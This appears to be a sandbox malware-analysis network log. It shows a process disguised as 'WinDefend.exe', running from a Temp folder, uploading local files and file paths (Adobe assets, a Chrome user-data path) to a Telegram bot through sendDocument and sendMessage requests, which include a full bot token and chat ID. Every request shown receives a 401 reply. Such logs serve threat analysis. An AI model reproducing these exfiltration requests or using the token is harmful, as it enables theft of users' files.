2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: 41 f9 ea 77 a1 21 10 4d f3 49 d6 35 b8 b1 24 fd d8 29 b9 ba a4 df 0e c5 51 be c8 94 d9 74 87 2b 9a cb b9 06 64 ac e4 1a 60 4b 6c 71 bd ec 1c ea 18 ec 70 f5 4b 01 85 b2 2b ee 0f f8 1f 0c 84 bd 1d 4b 25 79 26 ed e2 4a 2e c6 55 64 33 d2 f9 47 3a b2 a4 5d e5 a2 74 1c cc 33 c5 11 17 bf c6 f5 7f 32 55 f1 fe 22 2f 25 ca 08 39 a6 a8 7a 6a fe 5e 5b a3 ab f1 d7 24 6b 8e d6 7c 54 f3 b9 6e 96 ae 4d 37 a8 e3 74 cf e9 7e af bb 55 6b ad a5 6b 1f af 3d 5f 7b a9 f6 da 8c e1 19 db 67 1c 9c f1 4a 9d be 6e 41 dd b2 ba c7 ea 26 eb ce d4 5d d6 cf d1 bf ae 7f cf d0 66 08 18 36 18 be 6f d8 65 38 62 78 db 30 65 f8 c4 68 30 36 1a ef 37 76 18 0f 18 5f a9 6f ad 1f af df 53 ff 66 fd b9 fa 8b f5 7f 6d e8 69 48 36 4c 35 bc df 70 be e1 5a a3 bd d1 d3 b8 ad f1 0f a6 85 a6 a4 69 8b e9 69 Data Ascii: Aw!MI5$)Qt+d`KlqpK+K%y&J.Ud3G:]t32U"/%9zj^[$k\|TnM7t~Ukk=_{gJnA&]f6oe8bx0eh067v_oSfmiH6L5pZii
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: bd 8a 68 6f c5 58 7b b2 7c 6a 16 2e 25 67 dc 7f 40 1f 7f e9 22 0e 0d a4 af ec c7 74 15 86 8a db d4 6c a5 ab 13 a3 b4 fa 72 0b b2 45 1b f7 38 2e 3f 48 70 a5 f3 36 89 00 fd 5c 2c 00 70 ad 9f 01 ee bd 6d ae 79 6b e2 a0 30 79 6b 92 a8 30 19 00 f7 33 20 fe 85 d4 d8 f7 eb a2 2b 75 3a db 10 fc 98 7a d6 d8 34 70 96 71 c4 23 4e 2b 44 01 d4 a1 13 57 2b 4f b3 78 2a fb 46 ab 2b 4b 2a 88 8d 95 1d 8d 89 2b 48 d4 b1 4b 97 f5 cd b9 06 b2 21 bc 32 d0 2f 5a 24 4c a2 2b 17 ef 25 9a 42 2d a5 bd 94 2c 8b 0a 4f 91 07 33 56 ea 0b ec a9 65 af 6f 1a 3c 61 ca 76 02 39 a0 0c ec 30 f4 20 c0 2a 01 ef d8 0e 0e b0 84 0e 2f 86 36 18 57 af 25 50 f3 c2 26 cc 03 76 21 07 02 09 a1 92 af 22 d8 29 8a 2d a8 d0 5c d1 d6 af c8 c2 d3 85 4a a1 90 44 22 82 3b 9a 56 d5 d4 45 56 a7 5e 3e 51 4c 03 83 Data Ascii: hoX{\|j.%g@"tlrE8.?Hp6\,pmyk0yk03 +u:z4pq#N+DW+OxF+K+HK!2/Z$L+%B-,O3Veo<av90 */6W%P&v!")-\JD";VEV^>QL
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: cc 2c 92 ce b1 74 95 7d 13 4b 6b ed 20 62 87 c4 18 f1 d3 b5 76 6e f1 7e 72 75 5a d3 e3 1d f0 11 49 1d b2 37 a7 98 1c 44 a3 f8 d8 93 0d 0f 21 a0 93 3e 4b a7 73 3f 8f 49 3c 9f 7c 4a 75 aa a6 a1 e2 c9 c1 b7 a2 79 82 bf cd 31 2d 49 97 c7 5f 5e da 1e d2 2c da 25 7c 77 f5 6c 5d ab 47 ef 92 ba 00 e4 12 1c f0 45 74 49 54 65 9c 64 ab 90 3e 1b b8 26 6c d9 67 1e 53 3a 66 c3 a7 ed b7 4a af d5 4b 68 e3 11 ed 41 4b b1 45 44 9f 45 db ae 33 5f 86 34 74 b6 5e 39 5f 55 ea 75 df ff fe 17 67 e2 44 c9 69 51 fa 10 4f fa c4 41 ee 36 73 bd 34 26 21 24 4e b5 58 e1 a5 a9 ca ac be ec 51 5b 71 f1 ba 84 1a 72 73 04 9a 79 27 61 3a 7f c0 11 c8 d8 17 e9 bd 33 57 d5 ed 76 c7 40 07 46 94 3e 16 51 a8 16 8d 72 d4 f1 6e b6 f3 21 c2 b1 24 9f fd bf 0e 53 da f8 7d 68 54 01 89 e6 3b 58 f3 21 f3 Data Ascii: ,t}Kk bvn~ruZI7D!>Ks?I<\|Juy1-I_^,%\|wl]GEtITed>&lgS:fJKhAKEDE3_4t^9_UugDiQOA6s4&!$NXQ[qrsy'a:3Wv@F>Qrn!$S}hT;X!
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: 05 c2 47 42 94 7f 59 8a 02 87 a5 91 d2 69 3f 58 c3 f3 f4 84 f7 83 91 2a 48 56 09 ee 8c 13 e0 30 07 80 be 79 83 1c a2 d7 b9 90 50 f3 05 7e 4d 6f 70 e3 93 ea c0 75 12 d7 d1 22 ff d8 3e 6f 25 b7 a9 cf a2 e6 21 b4 8f a2 06 38 cf 9d 64 f0 dc 4f 6d b0 1d 8b c2 57 96 39 37 ed 95 79 bb 92 a8 c1 4b 0a 95 b1 7d 9b 06 61 55 37 b0 7d d3 be f1 fb fb 90 f6 10 b5 4c f6 82 8a 49 cf 54 9f 3d 27 1e dd 07 9f e2 25 8e 9b 0f ac f6 93 a5 50 b7 0e af ab 77 90 e0 39 7f fb 07 5e 8a 17 3d b3 06 cb 91 db c6 1f 8c ac 86 5a 59 33 78 f0 81 c4 d4 9b 5d f8 3d 8b 8e 45 75 93 31 01 be c7 5c 25 4b 36 74 c0 8c 54 16 1f 05 2f e6 79 bd cd 12 16 b5 60 62 fb 97 cb 96 bb de 7b 2d 43 c7 7e ac 79 fd 5a 06 61 98 65 6e 68 ab ef 8e 49 9e 16 d9 ee e0 1f c9 c1 d8 01 b9 b2 42 39 39 6f d0 c2 3c 0e 16 63 Data Ascii: GBYi?X*HV0yP~Mopu">o%!8dOmW97yK}aU7}LIT='%Pw9^=ZY3x]=Eu1\%K6tT/y`b{-C~yZaenhIB99o<c
2024-05-23 13:34:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	61105	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:38 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f2a56f47-f128-4051-8818-f094aa75114e" Host: api.telegram.org Content-Length: 2446 Expect: 100-continue
2024-05-23 13:34:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:38 UTC	40	OUT	Data Raw: 2d 2d 66 32 61 35 36 66 34 37 2d 66 31 32 38 2d 34 30 35 31 2d 38 38 31 38 2d 66 30 39 34 61 61 37 35 31 31 34 65 0d 0a Data Ascii: --f2a56f47-f128-4051-8818-f094aa75114e
2024-05-23 13:34:38 UTC	99	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 63 6c 6f 75 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 63 6c 6f 75 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=ccloud.png; filename*=utf-8''ccloud.png
2024-05-23 13:34:38 UTC	2122	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 04 03 00 00 00 79 e1 7a 1e 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 30 50 4c 54 45 ff ff ff e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e1 41 32 e7 20 98 87 00 00 00 10 74 52 4e 53 00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 76 95 01 15 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 07 6d 49 44 41 54 68 81 ed 5a 5b 6c 54 45 18 3e 67 b7 2d 72 51 9b 68 bc 47 36 1a 79 f0 02 68 94 18 8d b0 3e 20 31 2a 56 45 a2 21 da 0a 41 7d 50 4b bc c5 04 b5 9b 68 b4 Data Ascii: PNGIHDRyzsBITO0PLTEA2A2A2A2A2A2A2A2A2A2A2A2A2A2A2 tRNS"3DUfwvpHYs~tEXtSoftwareAdobe Fireworks CS6mIDAThZ[lTE>g-rQhG6yh> 1*VE!A}PKh
2024-05-23 13:34:38 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 32 61 35 36 66 34 37 2d 66 31 32 38 2d 34 30 35 31 2d 38 38 31 38 2d 66 30 39 34 61 61 37 35 31 31 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --f2a56f47-f128-4051-8818-f094aa75114eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:38 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:38 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 32 61 35 36 66 34 37 2d 66 31 32 38 2d 34 30 35 31 2d 38 38 31 38 2d 66 30 39 34 61 61 37 35 31 31 34 65 2d 2d 0d 0a Data Ascii: --f2a56f47-f128-4051-8818-f094aa75114e--
2024-05-23 13:34:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	61106	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:38 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="76e745c7-b56c-4502-9c5d-96096f6bc769" Host: api.telegram.org Content-Length: 2132 Expect: 100-continue
2024-05-23 13:34:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:38 UTC	40	OUT	Data Raw: 2d 2d 37 36 65 37 34 35 63 37 2d 62 35 36 63 2d 34 35 30 32 2d 39 63 35 64 2d 39 36 30 39 36 66 36 62 63 37 36 39 0d 0a Data Ascii: --76e745c7-b56c-4502-9c5d-96096f6bc769
2024-05-23 13:34:38 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=32.png; filename*=utf-8''32.png
2024-05-23 13:34:38 UTC	1816	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 06 df 49 44 41 54 58 85 cd 57 6d 88 5d d5 15 5d eb 9c 73 df 9b 97 f7 de cc 68 3e 1a 35 c6 d4 18 4d d3 20 31 29 b5 2a 42 04 2b 2d 05 63 0a 53 25 25 a5 7f 5a 1a 5a 29 9a d2 1f 25 a1 2f 44 b4 50 b4 1f d8 52 b1 55 5a 6b b5 9d fa 01 96 62 d1 80 06 91 52 3b 9a d8 04 21 48 4a b5 46 93 26 63 9c 99 37 1f f7 9e b3 57 7f dc f7 92 c9 24 19 27 42 a1 1b 36 ef c2 3d 6f 9f b5 d7 5e 7b 9f 73 89 73 33 62 00 6e d6 15 83 30 00 3a c7 b8 73 30 81 73 5b 06 6a 8e 6b 01 20 cc 71 1d 41 08 37 2f 68 5e 70 cd 8a eb 62 9e 9a 48 33 56 78 20 38 3f ca 5d 4b 5e 02 07 c7 00 10 73 60 e2 c3 91 aa dc fc 33 4f dc ba 76 f4 83 b1 c1 a3 87 86 2f 75 7e 66 15 ca 94 db c9 e1 37 2b 0f bc 79 73 3c Data Ascii: PNGIHDR szzIDATXWm]]sh>5M 1)*B+-cS%%ZZ)%/DPRUZkbR;!HJF&c7W$'B6=o^{ss3bn0:s0s[jk qA7/h^pbH3Vx 8?]K^s`3Ov/u~f7+ys<
2024-05-23 13:34:38 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 37 36 65 37 34 35 63 37 2d 62 35 36 63 2d 34 35 30 32 2d 39 63 35 64 2d 39 36 30 39 36 66 36 62 63 37 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --76e745c7-b56c-4502-9c5d-96096f6bc769Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:38 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:38 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 37 36 65 37 34 35 63 37 2d 62 35 36 63 2d 34 35 30 32 2d 39 63 35 64 2d 39 36 30 39 36 66 36 62 63 37 36 39 2d 2d 0d 0a Data Ascii: --76e745c7-b56c-4502-9c5d-96096f6bc769--
2024-05-23 13:34:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	61107	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:39 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 183 Expect: 100-continue
2024-05-23 13:34:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:39 UTC	183	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 43 6f 6d 70 61 72 65 4d 61 72 6b 65 72 73 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 43 6f 6d 70 61 72 65 4d 61 72 6b 65 72 73 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 32 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+CompareMarkers.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CCompareMarkers.pdf%0ASize%3A+21+KB
2024-05-23 13:34:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	61108	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:39 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 192 Expect: 100-continue
2024-05-23 13:34:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:39 UTC	192	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 63 6c 6f 75 64 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 63 63 6c 6f 75 64 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 32 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+ccloud_retina.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cccloud_retina.png%0ASize%3A+12+KB
2024-05-23 13:34:39 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:39 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	61109	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:39 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:40 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:40 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:40 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	61110	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:40 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e518a1a9-6cde-421c-b9a7-a1edbc30fa72" Host: api.telegram.org Content-Length: 22687 Expect: 100-continue
2024-05-23 13:34:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:40 UTC	40	OUT	Data Raw: 2d 2d 65 35 31 38 61 31 61 39 2d 36 63 64 65 2d 34 32 31 63 2d 62 39 61 37 2d 61 31 65 64 62 63 33 30 66 61 37 32 0d 0a Data Ascii: --e518a1a9-6cde-421c-b9a7-a1edbc30fa72
2024-05-23 13:34:40 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 43 6f 6d 70 61 72 65 4d 61 72 6b 65 72 73 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 6f 6d 70 61 72 65 4d 61 72 6b 65 72 73 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=CompareMarkers.pdf; filename*=utf-8''CompareMarkers.pdf
2024-05-23 13:34:40 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 36 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 31 31 34 32 39 2f 4f 20 31 38 2f 45 20 34 34 30 36 2f 4e 20 33 2f 54 20 31 31 31 31 36 2f 48 20 5b 20 34 35 30 20 31 36 38 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 32 32 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 34 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 35 42 38 44 30 38 33 32 41 37 38 41 36 43 32 33 45 31 39 30 30 41 38 42 41 38 44 39 37 39 34 33 3e 3c 39 41 35 37 30 30 34 33 41 34 39 31 34 38 33 44 42 35 38 46 34 33 30 30 34 34 31 35 41 35 33 Data Ascii: %PDF-1.6%16 0 obj<</Linearized 1/L 11429/O 18/E 4406/N 3/T 11116/H [ 450 168]>>endobj 22 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<5B8D0832A78A6C23E1900A8BA8D97943><9A570043A491483DB58F43004415A53
2024-05-23 13:34:40 UTC	4096	OUT	Data Raw: 1d ce 1d 2d 3f 9b ff 7c f4 8c f6 99 9a b3 ca 67 4b cf 91 ce 15 9c 9b 39 9f 77 7e f2 42 c6 85 f1 8b 89 17 87 3a 57 74 3e ba b4 e4 d2 9d ae b0 ae de cb 81 97 af 5e f1 b9 72 a9 db bd fb fc 55 97 ab 67 ae 39 5d 3b 7d 9d 7d bd ed 86 fd 8d d6 1e bb 9e 96 5f ec 7e 69 e9 b5 ef 6d bd e9 70 b3 fd 96 e3 ad 8e be 05 7d e7 fa 5d fb 2f de f6 ba 7d e5 8e ff 9d 1b 03 8b 06 fa ee 2e be 7b ff 5e dc 3d e9 7d de fd d1 07 a9 0f 5e 3f cc 7a 38 fd 68 fd 63 ec e3 a2 27 0a 4f 2a 9e aa 3f ad fd d5 f8 d7 66 a9 bd f4 ec a0 d7 60 cf b3 88 67 8f 86 b8 43 2f ff 95 f9 af 4f c3 05 cf a9 cf 2b 46 b4 46 ea 47 ad 47 cf 8c f9 8c dd 7a b1 f4 c5 f0 cb 8c 97 d3 e3 85 bf 29 fe b6 f7 95 d1 ab 9f 7e 77 fb bd 67 62 c9 c4 f0 6b d1 eb 99 3f 4a de a8 be 39 fa d6 f6 6d e7 64 e8 e4 d3 77 69 ef a6 a7 8a Data Ascii: -?\|gK9w~B:Wt>^rUg9];}}_~imp}]/}.{^=}^?z8hc'O*?f`gC/O+FFGGz)~wgbk?J9mdwi
2024-05-23 13:34:40 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 72 64 66 3a 6c 69 3e 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 63 3a 63 72 65 61 74 6f 72 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 75 75 69 64 3a 37 38 64 34 38 34 63 66 2d 63 35 66 64 2d 34 30 39 32 2d 38 66 32 37 2d 66 31 38 30 35 33 66 36 31 31 36 34 3c 2f 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 75 75 69 64 3a 34 66 32 66 62 34 32 61 2d 33 39 64 38 2d 36 61 34 62 2d 38 32 64 66 2d 33 65 63 64 32 34 37 37 62 31 34 64 3c 2f 78 6d 70 4d Data Ascii: <rdf:li>Adobe Systems Inc</rdf:li> </rdf:Seq> </dc:creator> <xmpMM:DocumentID>uuid:78d484cf-c5fd-4092-8f27-f18053f61164</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:4f2fb42a-39d8-6a4b-82df-3ecd2477b14d</xmpM
2024-05-23 13:34:40 UTC	4096	OUT	Data Raw: 30 c6 49 d1 a6 40 11 20 5b 3d 2c c0 d0 00 6b 7b 68 87 1d 68 89 b6 85 ca 56 aa 8f 6c d9 d3 8f 16 13 d7 a7 5d ec 90 fc ff 48 8a 62 5c 2e 8a 45 51 96 c5 cd aa 28 97 45 b9 5a 15 77 77 f0 19 03 7d 75 43 84 6f 64 8f 14 8d 42 a8 06 e5 b4 19 da 51 b5 28 7e c0 03 f6 94 c3 f0 98 ea 78 3a 10 3c f1 a3 cc 4f 18 d9 cd 66 9e e8 15 0f cd 3d e3 35 c6 20 ec 2b de d7 ff 65 ef 4d d3 90 a7 41 51 f8 b9 bc 82 da d3 91 40 a1 77 03 28 e3 55 ea 1b 4b 7f 40 bb 88 4a 11 97 e8 d2 d0 a2 4f bd c5 14 c1 b5 6e a0 37 f0 5c 12 a2 b1 9a 8a d5 2d bc 27 17 29 b0 cb 52 71 7b 0d ad c7 23 f1 79 d6 50 27 6b 29 82 c6 b6 25 7f 7e e9 da 02 59 6b 0e c1 04 a0 5e 63 e8 80 86 fc 6a ac e3 c4 d0 78 54 d1 70 3b 6d 32 36 a7 b5 d4 c4 0f cb 9b b6 8b d0 9b 21 05 38 90 8f 9d 4b 01 07 2d 6d 70 fa 9a 87 33 19 19 Data Ascii: 0I@ 